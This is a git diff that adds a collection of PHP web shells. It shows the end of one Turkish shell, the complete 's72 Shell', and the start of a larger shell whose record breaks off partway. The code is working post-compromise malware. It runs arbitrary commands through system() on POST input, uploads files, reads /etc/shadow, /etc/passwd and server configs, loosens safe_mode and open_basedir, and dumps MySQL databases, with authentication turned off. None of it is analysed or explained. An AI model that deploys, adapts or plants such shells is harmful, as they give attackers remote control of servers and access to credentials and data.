+      <font color="#FF0000"><b><font face="Comic Sans MS" size="1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [ 
+      Server Bilgileri ]</td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      </font></b></font>
+</p>
+      <p align="center">
+        <font color="#800080"><b><font face="Verdana" style="font-size: 8pt">
+        Dizin</font></b></font><font face="Verdana" style="font-size: 8pt"><font color="#800080"><b>:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
+        <br />
+        <b>Shell Dizini:</b> <? echo $SCRIPT_FILENAME ?>
+        <br>
+        &nbsp;</font></font><p align="center"><form method="post">
+<p align="center">
+<font color="#800080">
+<br>
+</font><font face="Verdana" style="font-size: 8pt" color="#800080">Buraya 
+Kodunuzu Yazýn :)</font><font color="#111111"><br>
+<br>
+</font>
+<font color="#FF0000">
+<textarea size="70" name="command" rows="2" cols="43" ></textarea> <br>
+<br><input type="submit" value="Çalýþtýr!"></font><font color="#FF0000"><br>
+&nbsp;<br></font></p>
+      </form>
+      <p align="center">
+        <font color="#FF0000">
+        <textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea></font><p align="center">
+        &nbsp;<p align="center">
+              <font color="#FF0000">
+              <td width="49%" height="24" bgcolor="#FCFEBA">
+              </font>
+      <p align="center"><font color="#FF0000"><b>
+      <font face="Comic Sans MS" size="1">[ Diziler -_- Dizinler ]</td>
+      <td width="51%" height="24" bgcolor="#FCFEBA">
+      </font></b></font>
+      <form method="post">
+<p align="center">
+<font face="Verdana" style="font-size: 11pt">
+<?
+$folder=opendir('./');
+while ($file = readdir($folder)) {
+if($file != "." && $file != "..")
+echo '<a target="_blank" href="'.$file.'">'.$file.'</a ><br>';
+}
+closedir($folder);
+?></p>
+      </form>
+      <p align="center">
+      <br>
+        <b><font face="Comic Sans MS" size="1" color="#FF0000">[ Upload ]</font></b></font><font face="Comic Sans MS" size="1"><b><font color="#FF0000"></td></font></b></font><form enctype="multipart/form-data" method="post">
+<p align="center"><br>
+<br>
+<font face="Verdana" style="font-size: 8pt" color="#800080">Buradan Dosya Upload Edebilirsiniz.</font><br>
+<br>
+<input type="file" name="file" size="20"><br>
+<br>
+<font style="font-size: 5pt">&nbsp;</font><br>
+<input type="submit" value="Yükle!"> <br>
+&nbsp;</p>
+</form>
+<?php
+
+function check_file()
+{
+global $file_name, $filename;
+    $backupstring = "copy_of_";
+    $filename = $backupstring."$filename";
+
+    if( file_exists($filename))
+    {
+        check_file();
+    }
+}
+
+if(!empty($file))
+{
+    $filename = $file_name;
+    if( file_exists($file_name))
+    {
+        check_file();
+        echo "<p align=center>Dosya Zaten Bulunuyor</p>";
+    }
+
+    else
+    {
+        copy($file,"$filename");
+        if( file_exists($filename))
+        {
+            echo "<p align=center>Dosya Baþarýlý Bir Þekilde Yüklendi</p>";
+        }
+        elseif(! file_exists($filename))
+        {
+            echo "<p align=center>Dosya Bulunamadý</p>";
+        }
+    }
+}
+?> 
+<font face="Verdana" style="font-size: 8pt">
+<p align=\"center\"></font>
+</td>
+        <font color="#111111">
+        <br>
+        <br>
+        <br /><br /> </font>
+              <?php 
+// Check for Safe Mode
+if( ini_get('safe_mode') ) {
+   print '<font color=#FF0000><b>Güvenlik Açýk</b></font>';
+} else {
+   print '<font color=#008000><b>Güvenlik Kapalý</b></font>';
+}
+
+?>
+
+        <!--mstheme--></font>
+
+        </body>
+
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/s72_shell.txt b/xakep-shells/PHP/s72_shell.txt
new file mode 100644
index 0000000..fdcc41a
--- /dev/null
+++ b/xakep-shells/PHP/s72_shell.txt
@@ -0,0 +1,141 @@
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>s72 Shell v1.0 Codinf by Cr@zy_King</title>
+<meta name="Microsoft Theme" content="refined 011">
+</head>
+
+<body background="refbgd2.gif" bgcolor="#000000" text="#FFFFFF" link="#666699" vlink="#999999" alink="#999900">
+
+<!--mstheme--><font face="Times New Roman">
+
+<p><font face="Comic Sans MS" color="#FF0000"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </b>s72 Shell v1.1 Coding by <a href="mailto:crazy_king@turkusev.net">
+<font color="#00FF00">Cr@zy_King&nbsp; </font>
+</a> </font></p>
+
+      <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+      <font color="#FF0000"><b><font face="Comic Sans MS" size="1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [ 
+      Server Bilgileri ]</td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      </font></b></font>
+</p>
+      <p align="center">
+        <font color="#800080"><b><font face="Verdana" style="font-size: 8pt">
+        Dizin</font></b></font><font face="Verdana" style="font-size: 8pt"><font color="#800080"><b>:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
+        <br />
+        <b>Shell Dizini:</b> <? echo $SCRIPT_FILENAME ?>
+        <br>
+        &nbsp;</font></font><p align="center"><form method="post">
+<p align="center">
+<font color="#800080">
+<br>
+</font><font face="Verdana" style="font-size: 8pt" color="#800080">Buraya 
+Kodunuzu Yazýn :)</font><font color="#111111"><br>
+<br>
+</font>
+<font color="#FF0000">
+<textarea size="70" name="command" rows="2" cols="43" ></textarea> <br>
+<br><input type="submit" value="Çalýþtýr!"></font><font color="#FF0000"><br>
+&nbsp;<br></font></p>
+      </form>
+      <p align="center">
+        <font color="#FF0000">
+        <textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea></font><p align="center">
+        &nbsp;<p align="center">
+              <font color="#FF0000">
+              <td width="49%" height="24" bgcolor="#FCFEBA">
+              </font>
+      <p align="center"><font color="#FF0000"><b>
+      <font face="Comic Sans MS" size="1">[ Diziler -_- Dizinler ]</td>
+      <td width="51%" height="24" bgcolor="#FCFEBA">
+      </font></b></font>
+      <form method="post">
+<p align="center">
+<font face="Verdana" style="font-size: 11pt">
+<?
+$folder=opendir('./');
+while ($file = readdir($folder)) {
+if($file != "." && $file != "..")
+echo '<a target="_blank" href="'.$file.'">'.$file.'</a ><br>';
+}
+closedir($folder);
+?></p>
+      </form>
+      <p align="center">
+      <br>
+        <b><font face="Comic Sans MS" size="1" color="#FF0000">[ Upload ]</font></b></font><font face="Comic Sans MS" size="1"><b><font color="#FF0000"></td></font></b></font><form enctype="multipart/form-data" method="post">
+<p align="center"><br>
+<br>
+<font face="Verdana" style="font-size: 8pt" color="#800080">Buradan Dosya Upload Edebilirsiniz.</font><br>
+<br>
+<input type="file" name="file" size="20"><br>
+<br>
+<font style="font-size: 5pt">&nbsp;</font><br>
+<input type="submit" value="Yükle!"> <br>
+&nbsp;</p>
+</form>
+<?php
+
+function check_file()
+{
+global $file_name, $filename;
+    $backupstring = "copy_of_";
+    $filename = $backupstring."$filename";
+
+    if( file_exists($filename))
+    {
+        check_file();
+    }
+}
+
+if(!empty($file))
+{
+    $filename = $file_name;
+    if( file_exists($file_name))
+    {
+        check_file();
+        echo "<p align=center>Dosya Zaten Bulunuyor</p>";
+    }
+
+    else
+    {
+        copy($file,"$filename");
+        if( file_exists($filename))
+        {
+            echo "<p align=center>Dosya Baþarýlý Bir Þekilde Yüklendi</p>";
+        }
+        elseif(! file_exists($filename))
+        {
+            echo "<p align=center>Dosya Bulunamadý</p>";
+        }
+    }
+}
+?> 
+<font face="Verdana" style="font-size: 8pt">
+<p align=\"center\"></font>
+</td>
+        <font color="#111111">
+        <br>
+        <br>
+        <br /><br /> </font>
+              <?php 
+// Check for Safe Mode
+if( ini_get('safe_mode') ) {
+   print '<font color=#FF0000><b>Güvenlik Açýk</b></font>';
+} else {
+   print '<font color=#008000><b>Güvenlik Kapalý</b></font>';
+}
+
+?>
+
+        <!--mstheme--></font>
+
+        </body>
+
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/sh.php.php.txt b/xakep-shells/PHP/sh.php.php.txt
new file mode 100644
index 0000000..59c377b
--- /dev/null
+++ b/xakep-shells/PHP/sh.php.php.txt
@@ -0,0 +1,644 @@
+<?php
+
+                                       ##    ##  #
+                                         ##     #  ####
+                                           ## ##  ##  ##
+                                       ###  ###  ##    #
+                                     ### ##     ##     ##
+                                   ##    ###  ##       ##
+                                          #     #     ##
+                                        ###    #     ##
+                                      ### #   ##    ##
+                                      #   ##  ##   ##
+                                           #   #####
+                                   #       ##   ###
+                                  ##     ###     #
+                                   #######
+                                    #####
+
+//error_reporting(0);
+@ini_restore("safe_mode"); 
+@ini_restore("open_basedir"); 
+if(get_magic_quotes_gpc()){
+while(list($key,$val)=each($_POST)){
+$_POST[$key]=stripslashes($val);}}
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$name='1'; 
+$pass='c8d3a760ebab631565f8509d84b3b3f1';
+if(false){#esli nado pishem 'true'
+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass){
+header('WWW-Authenticate: Basic realm="Auth"');header('HTTP/1.0 401 Unauthorized');
+exit;}}
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+function font($color,$text,$size=4){return("<font color=$color size=$size >$text</font>");}
+function w($a){return str_repeat("&nbsp;",$a);}
+function b($b){return "<b>$b</b>";}
+function e($e){switch($e){
+case 0:return('no such file');
+case 1:return('no such dirictory');
+case 2:return('permission denied');
+case 3:return('is not dirictory');
+case 4:return('is a dirictory');
+}}
+function test_file($filename){
+return(file_exists($filename)?(is_readable($filename)?false:font('red',e(2))):font('red',e(0)));}
+if(isset($_POST['downl']) && !empty($_POST['downf'])){
+if(!preg_match('/^\//',$_POST['downf'])){
+$_POST['downf']=$_POST['th'].'/'.$_POST['downf'];}
+if(!test_file($_POST['downf'])){
+if(!is_dir($_POST['downf'])){
+$fd=fopen($_POST['downf'], "rb");
+$nam=preg_replace('/.+\//','',$_POST['downf']);
+header("Content-Type: application/octet-stream; name=\"".$nam."\"");
+header("Content-Length: ".filesize($_POST['downf']));
+header("Content-disposition: attachment; filename=\"".$nam."\"");
+while(!feof($fd)){
+$buffer=fgets($fd,4096);
+echo $buffer;
+}
+fclose ($fd);
+exit;
+}
+else $error=font('red',e(4));
+}
+else $error=test_file($_POST['downf']);}
+if(isset($_POST['sql']) && !isset($_POST['exitsql'])){
+$text="<body bgcolor=#C2DDFF>
+<b>Mysql@server:user:pass:db</b>
+<form method='POST'>
+";
+$a=array('server','user','password','db');$i=-1;
+while($i++<3){
+$text.= "<input type='text' name='".$a[$i]."' value='".((!empty($_POST[$a[$i]]))?$_POST[$a[$i]]:'')."'>\n";}
+$text.="<input type='submit' name='sql' value='Connect'>
+<input type='submit' name='exitsql' value='Exit'>";
+$text="\n<body bgcolor=#C2DDFF>
+<b>Mysql@server:user:pass:db</b>
+<form method='POST'>\n";
+$a=array('srv','user','pass','db');$i=-1;
+while($i++<3){
+$text.= "<input type='text' name='".$a[$i]."' value='".((!empty($_POST[$a[$i]]))?$_POST[$a[$i]]:(($i==0)?'localhost':null))."'>\n";}
+$text.="<input type='submit' name='sql' value='Connect'><input type='submit' name='exitsql' value='Exit'>\n";
+if(isset($_POST['sql'])){
+if(isset($_POST['user']))$user=$_POST['user'];
+if(isset($_POST['pass']))$password=$_POST['pass'];
+if(isset($_POST['srv'])){
+$server=$_POST['srv'];
+$connect=mysql_connect($server,$user,$password) or die($text."</form>not connect");}
+else{die($text."</form>");}
+if(!empty($_POST['db'])){mysql_select_db($_POST['db'])or die("Could not select db<br>");}
+function write($data){
+switch($_POST['save']){
+case 0:
+global $dump;
+$dump.=$data;
+break;
+case 1:
+global $fp;
+switch($_POST['compr']){
+case 0:
+fwrite($fp,$data);
+break;
+case 1:
+gzwrite($fp, $data);
+break;
+case 2:
+bzwrite($fp,$data);
+break;}
+break;}}
+function sqlh(){
+global $dump,$server;
+write("#\n#Server : ".getenv('SERVER_NAME')."
+#DB_Host : ".$server."
+#DB : ".$_POST['db']."
+#Table : ".$_POST['table_sel']."\n#\n\n");}
+function sql(){
+global $dump,$connect;
+$row=mysql_fetch_row(mysql_query("SHOW CREATE TABLE `".$_POST['table_sel']."`",$connect));
+write("DROP TABLE IF EXISTS `".$_POST['table_sel']."`;\n".$row[1].";\n\n");}
+function sql1(){
+global $connect;
+$result=mysql_query("SELECT * FROM `".$_POST['table_sel']."`",$connect);
+function test($aaa){
+$d=array();
+while (list($key,$val)=each($aaa)){$d[$key]=addslashes($val);}
+return($d);}
+while ($line=mysql_fetch_assoc($result)) {
+((!isset($key))?($key=implode('`, `',array_keys($line))):null);
+$ddd=test(array_values($line));
+$val=implode('\', \'',$ddd);
+write("INSERT INTO `".$_POST['table_sel']."`(`".$key."`) VALUES ('".$val."');\n");}
+mysql_free_result($result);}
+function head($tmpfname,$name){
+header("Content-Type: application/octet-stream; name=\"$name\"");
+header("Content-Length: ".filesize($tmpfname)."");
+header("Content-disposition: attachment; filename=\"$name\"");
+$fd=fopen($tmpfname, "r");
+while(!feof($fd)){
+echo fgets($fd, 4096);}
+fclose($fd);
+unlink($tmpfname);
+exit;}
+if(isset($_POST['back']) && isset($_POST['table_sel'])){
+$dump='';
+if($_POST['save']==1){
+$tmpfname=tempnam($_POST['save_p'], "FOO");
+switch($_POST['compr']){
+case 0:
+$fp=fopen($tmpfname,"w");
+break;
+case 1:
+$fp=gzopen($tmpfname, "w9");
+break;
+case 2:
+$fp=bzopen($tmpfname, "w");
+break;}}
+switch($_POST['as']){
+case 0:
+switch($_POST['as_sql']){
+case 0:
+sqlh();
+sql();
+break;
+case 1:
+sqlh();
+sql();
+sql1();
+break;
+case 2:
+sqlh();
+sql1();
+break;}
+if($_POST['save']==1){
+switch($_POST['compr']){
+case 0:
+$n='.txt';
+fclose($fp);
+break;
+case 1:
+$n='.gz';
+gzclose($fp);
+break;
+case 2:
+$n='.bz2';
+bzclose($fp);
+break;}
+head($tmpfname,$_POST['table_sel'].$n);}
+break;
+case 1:
+$res=mysql_query("SELECT * FROM `".$_POST['table_sel']."`",$connect); 
+if(mysql_num_rows($res) > 0) {
+while($row = mysql_fetch_assoc($res)) { 
+$values = array_values($row); 
+foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+$values = implode($_POST['cvs_term'], $values); 
+write($values);}}
+break;}}
+echo "$text\n<table height=200 width=100%><tr><td bgcolor=green width=10%>";
+$db_list=mysql_list_dbs($connect);
+echo "<select name='db' multiple size=30>\n";
+while($row=mysql_fetch_object($db_list)){
+$db1=$row->Database;
+echo "<option value='$db1' ".(($db1===$_POST['db'])?'selected':'').">$db1</option>\n";}
+echo "</select></td><td bgcolor=#CBC3B6>\n";
+if(!empty($_POST['db'])){
+$tb_list=mysql_list_tables($_POST['db']);
+echo "<select name='table_sel' multiple size=30>";
+for($i=0;$i<mysql_num_rows($tb_list);$i++){
+$n=mysql_fetch_array(mysql_query('select count(*) from '.mysql_tablename($tb_list,$i)));
+echo "<option value='".mysql_tablename($tb_list, $i)."'".($tr=((isset($_POST['table_sel']) && $_POST['table_sel']===mysql_tablename($tb_list, $i))?'selected':'')).">".mysql_tablename($tb_list, $i).'('.$n[0].")</option>";}
+echo "</select></td><td width=100%>
+<table  width=100% height=100% bgcolor='#E3FFF2'><tr><td height=20 bgcolor=#dfdfdf width=100%><nobr>\n";
+if(isset($_POST['table_sel'])){
+$c=array('Browse','SQL','Insert','Export');$i=-1;
+while($i++<3){echo "<input type=radio Name='go' value='".($i)."'>".$c[$i];}}
+echo "&nbsp;&nbsp;<b>".((isset($_POST['table_sel']))?$_POST['table_sel']:null)."</b></nobr></td></tr><tr width=100%><td width=100%>\n";}
+if(isset($_POST['push']) && isset($_POST['querysql']) && preg_match('/^\s*select /i',$_POST['querysql']))$_POST['go']=0;
+elseif(isset($_POST['push']))$_POST['go']=1;
+if(isset($_POST['back']))$_POST['go']=3;
+if(isset($_POST['brow']))$_POST['go']=0;
+if(isset($_POST['editr']) && isset($_POST['edit']))$_POST['go']=4;
+if(isset($_POST['ed_save']))$_POST['go']=5;
+if(isset($_POST['editr']) && !isset($_POST['edit']))$_POST['go']=0;
+if(isset($_POST['go'])){switch($_POST['go']){
+case 0:
+if(isset($_POST['querysql']) && preg_match('/^\s*select /i',$_POST['querysql']) && isset($_POST['push'])){
+$n=mysql_fetch_array(mysql_query(preg_replace('/^\s*select\s+.+\s+from\s+/i','select count(*) from',$_POST['querysql'])));
+$result=mysql_query($_POST['querysql'],$connect);}
+else{$n=mysql_fetch_array(mysql_query('select count(*) from '.$_POST['table_sel']));$sort='';
+if(!empty($_POST['sort']))$sort='ORDER BY `'.trim($_POST['sort']).'` ASC ';$co='0,20';
+if(isset($_POST['br_st']) && isset($_POST['br_en'])){
+$co=$_POST['br_en'].','.$_POST['br_st'];}
+$result = mysql_query("SELECT * FROM `".$_POST['table_sel']."` $sort limit $co",$connect);}
+for($i=0;$i<mysql_num_fields($result);$i++){
+if(ereg('primary_key',mysql_field_flags($result, $i)))
+$prim=mysql_field_name($result, $i);}
+$up_e='';
+echo "<div style='width:100%;height:450px;overflow:auto;'><table border=1>\n";
+while($line=mysql_fetch_array($result,MYSQL_ASSOC)){echo "<tr bgcolor='#C1D2C5'>\n";
+if(!isset($lk)){
+echo "<td><b>EDIT</b></td>";
+foreach(array_keys($line) as $lk){print((isset($prim) && $lk===$prim)?"<td><u><b>$lk</b></u></td>":"<td>$lk</td>\n");}}
+if(!isset($prim)){
+while(list($key,$val)=each($line)){$up_e.="`$key`='".addslashes($val)."' and ";}
+$up_e=substr($up_e,0,-5);}
+else{while(list($key,$val)=each($line)){
+if($key===$prim){$up_e.="`$key`='".addslashes($val)."'";}}}
+$up_e=urlencode($up_e);
+echo "</tr><tr><td><input type=radio name=edit value='$up_e'></td>\n";
+$up_e='';
+foreach($line as $col_value){echo "<td>".((strlen($col_value)>40)?'<textarea cols=40 rows=7>'.htmlspecialchars($col_value).'</textarea>':htmlspecialchars($col_value))."</td>\n";}
+echo "</tr>\n";}
+echo "</table></div><input type=submit name='brow' value='Browse'><b>Sort by
+<input type=text name=sort size=10 value='".((isset($_POST['sort']))?$_POST['sort']:'')."'>
+Show <input type=text size=5 value=".((isset($_POST['br_st']))?$_POST['br_st']:$n[0])." name='br_st'>row(s) starting from<input type=text size=5 value=".((isset($_POST['br_en']))?$_POST['br_en']:'0')." name='br_en'></b>
+<input type=submit name=editr value=Edit>";
+mysql_free_result($result);
+break;
+case 1:
+echo "<input type=submit name=push value=Run><br>
+<textarea cols=70% rows=8 name='querysql'>\n".((!empty($_POST['querysql']))?htmlspecialchars($_POST['querysql'],ENT_QUOTES):((isset($_POST['table_sel']))?"SELECT * FROM `".$_POST['table_sel']."` WHERE 1":null))."</textarea><br><br>\n";
+if(!empty($_POST['querysql'])){
+$result = mysql_query($_POST['querysql'],$connect) or print("<div style='background-color:red;'>".mysql_error($connect)."</div>");
+echo "<div style='background-color:green;'>".mysql_info($connect)."</div>";}
+break;
+case 2:
+echo "<div style='width:100%;height:550;overflow:auto;'><table>\n";
+$fields=mysql_list_fields($_POST['db'],$_POST['table_sel'],$connect);
+for($i=0;$i<mysql_num_fields($fields);$i++){
+echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($fields,$i).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($fields, $i).'('.mysql_field_len($fields, $i).")</b></td><td>".((mysql_field_len($fields, $i)<40)?"<input type='text' name='ed_key:".mysql_field_name($fields,$i)."' value='' size=40>":"<textarea name='ed_key:".mysql_field_name($fields,$i)."' cols=31 rows=7></textarea>")."</td></tr>\n";}
+echo "</table></div><input type=hidden name=insert value=1><input type=submit name=ed_save value=Insert>";
+break;
+case 3:
+if(!isset($_POST['back']))echo '<table height=250  align="center"><TR><TD>
+<table height=100%>
+<tr><td bgcolor="#A8B8F1" width="100" height="20"><b>&nbsp;&nbsp;Export as</b></td></tr>
+<tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="0" checked><b>&nbsp;&nbsp;SQL</b></td></tr>
+<tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="1"><b>&nbsp;&nbsp;CSV</b></td></tr>
+<tr><td height=100%></td></tr>
+</table></TD><td>
+<table width="140" height=100%>
+<TR><TD bgcolor="#A8B8F1"  height="20"><b>&nbsp;&nbsp;SQL</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="as_sql" value="0" ><b>Only structure</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="as_sql" value="1" checked><b>All</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="as_sql" value="2"><b>Only data</b></TD></TR>
+<TR><TD bgcolor="#A8B8F1"  height="20"><b>CSV</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><b>Terminated&nbsp;</b><input size=2 type=text Name="cvs_term" value=":"></TD></TR>
+<tr><td height=100%></tb></tr>
+</table>
+</td><td>
+<table height=100%>
+<tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="0" checked><b>&nbsp;View</b></td></tr>
+<tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="1"><b>&nbsp;Download</b></td></tr>
+<tr><td bgcolor="#E6D29C" width="130" height="40"><b>&nbsp;Temp path</b><br><input type=text Name="save_p" value="/tmp"></td></tr>
+<tr><td height=100%></td></tr>
+</table></td><td>
+<table width="120" height=100%>
+<TR><TD bgcolor="#A8B8F1"  height="20"><b>&nbsp;&nbsp;Compression</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="compr" value="0" checked><b>None</b></TD></TR>'.
+((@function_exists('gzencode'))?'<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="compr" value="1" ><b>Gzip</b></TD></TR>':'').
+((@function_exists('bzcompress'))?'<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="compr" value="2"><b>Bzip</b></TD></TR>
+<tr><td height=100%></td></tr>':'').'</table></td></TR>
+<tr><td><input type=submit value=backup name=back></td></tr>
+</table>';
+if(isset($_POST['back']) && isset($_POST['table_sel'])){
+if($_POST['save']==0){echo "<textarea cols=70 rows=10>".htmlspecialchars($dump)."</textarea>";}}
+break;
+case 4:
+if(isset($_POST['edit'])){
+$up_e=$_POST['edit'];
+echo "<input type=hidden name=edit value='$up_e'>";
+$up_e=urldecode($_POST['edit']);
+echo "<div style='width:100%;height:550;overflow:auto;'><table>\n";$fi=0;
+$result = mysql_query("SELECT * FROM `".$_POST['table_sel']."` WHERE $up_e",$connect);
+while($line=mysql_fetch_array($result,MYSQL_ASSOC)){
+foreach($line as $key=>$col_value) {
+echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($result,$fi).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($result,$fi).'('.mysql_field_len($result,$fi).")</b></td><td>".((mysql_field_len($result,$fi)<40)?"<input type='text' name='ed_key:".mysql_field_name($result,$fi)."' value='".htmlspecialchars($col_value,ENT_QUOTES)."' size=40>":"<textarea name='ed_key:".mysql_field_name($result,$fi)."' cols=31 rows=7>".htmlspecialchars($col_value,ENT_QUOTES)."</textarea>")."</td></tr>\n";
+$fi++;}}
+echo "</table></div><input type=submit name=ed_save value=Save>";}
+break;
+case 5:
+$ted='';
+$_POST2=$_POST;# X.Z. zachem, xernya kakaeto :)
+while(list($key1,$val1)=each($_POST2)){
+if(preg_match('/ed_key:(.+)/',$key1,$m))
+{$ted.="`".$m[1]."`= '".addslashes($val1)."', ";}}
+$ted=substr($ted,0,-2);
+$query=((isset($_POST['insert']))?"INSERT":"UPDATE")." `".$_POST['table_sel']."` SET $ted ".((isset($_POST['insert']))?'':"WHERE ".urldecode($_POST['edit'])." LIMIT 1 ");
+echo "<div style='background-color:white;'>".htmlspecialchars($query,ENT_QUOTES)."</div><br>";
+$result = mysql_query($query,$connect) or print("<div style='background-color:red;'>".mysql_error($connect)."</div>");
+echo "<div style='background-color:green;'>".mysql_info($connect)."</div>";
+break;}}
+echo "</td></tr></table></td></tr></table><input type=hidden name=sql>\n";}
+else echo $text;
+echo "</form></body>";exit;}
+echo "<html><body bgcolor=white><center><table bgcolor=orange height=10 border=1><tr><td><nobr>".font('blue',@php_uname())."</nobr></td></tr></table><table bgcolor=orange height=10 border=1><tr><nobr><td>".font('blue','PHP:'.@phpversion())."</nobr></td><td><nobr>".font('blue',date('H:i:s l d F Y'))."</nobr></td><td><nobr>".font('blue',getenv('SERVER_ADDR'))."</nobr></td><td><nobr>".font('blue',getenv('REMOTE_ADDR'))."</nobr></td></tr></table><br></center>\n";
+if(!test_file('/etc/shadow'))echo font('red',b('shadow readable<br>'));
+if(!test_file('/etc/shadow-'))echo font('red',b('shadow- readable<br>'));
+if(!test_file('/etc/master.passwd'))echo font('red',b('master.passwd readable<br>'));
+if(!empty($_POST['th']))@chdir($_POST['th']);
+echo ((is_writable('/tmp/'))?font('green',"TEMP USE".w(1)):font('red',"TEMP NO USE"));
+#UP
+if(isset($_POST['up']))@chdir('../');
+#CD
+if(isset($_POST['c']) && $_POST['cd']!=''){
+if(!test_file($_POST['cd'])){
+if(is_dir($_POST['cd'])){
+@chdir($_POST['cd']);
+}
+else $error=font('red',e(3));
+}
+else $error=test_file($_POST['cd']);}
+echo w(3)."<input type=text size=60 value=".getcwd().">";
+echo font('blue','USER : '.get_current_user());
+if(file_exists("/"))
+echo((is_readable("/"))?w(2).font('green','DIR / - IS READ'):w(2).font('red','DIR / - IS NO READ'));
+if(file_exists("C:/"))
+echo((is_readable("C:/"))?w(2).font('green','DIR C:/ - IS READ'):w(2).font('red','DIR C:/ - IS NO READ'));
+if(ini_get('safe_mode'))echo w(2).font('red','SAFE MODE');
+echo "<br>";
+?>
+<hr>
+<form method=POST name=main>
+<input type="submit" value="^" name="up">
+<input type=text name=cd>
+<input type=submit value=cd name=c>
+<input type=text name=open>
+<input type=submit value=open name=op>
+<input type=text name=new>
+<input type=submit name=cr value="new file">
+<input type=text name=exec>
+<input type=submit name=exe value=exec>
+<input type=submit name=info value=phpinfo>
+<br>
+<?php
+$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/etc/hosts','/proc/version','/proc/cpuinfo','/proc/meminfo','/etc/httpd/conf/httpd.conf','/usr/local/apache/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/etc/syslog.conf');
+echo '<select name=passwd>';
+foreach($ar_file as $ar_l){
+if(!test_file($ar_l))echo "<option value='$ar_l'>$ar_l</option>\n";}
+echo '</select><input type=submit name=passw value="read file">';
+?>
+<input type=submit name=menu value=upload>
+<input type=text name=downf>
+<input type=submit name=downl value=download>
+<input type=text name="test">
+<input type=submit name=tes value="perms">
+<input type="submit" name="sql" value="mysql">
+<input type="submit" name="eval" value="eval">
+<br>
+<input type=text name=strin>
+<input type=text name=remot>
+<input type=submit name=copy value=copy>
+<input type="text" name="renold" >
+<input type="text" name="rennew" >
+<input type="submit" name="rename" value="rename">
+<input type=text name=rm >
+<input type=submit name=del value=del>
+<br>
+<input type=reset value=RESET>
+<input type="text" name="mkdir">
+<input type="submit" name="mk" value="mkdir">
+<input type="text" name="rmdir">
+<input type="submit" name="rmd" value="rmdir">
+<input type="text" name="ch_mod">
+<?php
+for($bch=1;$bch<=3;$bch++){echo"<select name=ch_p$bch>\n";
